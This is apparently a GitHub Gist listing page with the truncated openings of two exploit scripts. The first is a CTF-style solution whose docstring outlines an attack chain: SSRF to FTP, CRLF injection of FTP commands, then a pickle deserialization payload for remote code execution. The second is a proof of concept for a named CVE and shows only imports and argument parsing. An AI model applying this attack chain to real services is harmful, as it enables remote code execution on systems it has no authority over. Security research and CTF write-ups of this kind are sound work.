Skip to content

Instantly share code, notes, and snippets.

View oh-my-bet.py
import requests
import string
import random
import socket
"""
TL;DR
1- SSRF to ftp through the avatar parameter on /login
2- Abuse the CRLF injection in python urllib to inject ftp commands
3- make a bson serialization payload and put the session val to be a pickle serialization to gain RCE
@Sp3eD-X
Sp3eD-X / veno.py
Last active Mar 15, 2021
PoC for CVE-2020-22550
View veno.py
import requests
import base64
import zipfile
import io
import sys
import argparse
class Args(object):
def __init__(self):
self.parser = argparse.ArgumentParser()